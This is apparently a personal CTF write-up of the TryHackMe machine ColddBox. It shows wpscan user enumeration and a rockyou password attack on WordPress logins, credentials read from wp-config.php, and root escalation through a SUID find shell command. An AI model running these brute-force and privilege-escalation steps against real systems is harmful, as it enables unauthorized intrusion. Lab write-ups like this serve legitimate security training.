Jacob the Boss

An easy level machine with multiple ways to escalate privileges.

This is ColddBox from THM.


HTTP on port 80 and SSH hiding away on port 4512. We won’t need it anyway.


What’s that - did someone say Wordpress?

root@kali:/opt/tryhackme/colddbox# wpscan -e --url

Gets 3 users; let’s run a password attack:

root@kali:/opt/tryhackme/colddbox# wpscan -U 'hugo,c0ldd,philip' -P /usr/share/wordlists/rockyou.txt --url

[+] Performing password attack on Wp Login against 3 user/s
[SUCCESS] - c0ldd / 9876543210            

Bingo. From there, it’s upload a plugin and get a shell.


This is our user; we can find the database password:

[+] Searching Wordpress wp-config.php files
wp-config.php files found: /var/www/html/wp-config.phpdefine('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');           

This is also the user password for c0ldd, so let’s run sudo -l:

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Wow, we do have a few methods we can practice if we want. But let’s not; find has the SUID bit set as well:

c0ldd@ColddBox-Easy:~$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -lash
ls -lash
total 32K
4,0K drwx------  4 root root 4,0K sep 24 18:52 .
4,0K drwxr-xr-x 23 root root 4,0K sep 24 16:47 ..
4,0K -rw-------  1 root root   10 oct 19 18:53 .bash_history
   0 -rw-r--r--  1 root root    0 oct 14 13:28 .bashrc
4,0K drwx------  2 root root 4,0K sep 24 18:52 .cache
4,0K -rw-------  1 root root  220 sep 24 17:02 .mysql_history
4,0K drwxr-xr-x  2 root root 4,0K sep 24 16:54 .nano
4,0K -rw-r--r--  1 root root  148 ago 17  2015 .profile
4,0K -rw-r--r--  1 root root   49 sep 24 18:23 root.txt
# cat root.txt
cat root.txt

Okey dokey. I’ve also got user on HTB Ready; I haven’t been on HTB for quite a while before now. I’m not allowed to write it up anyway.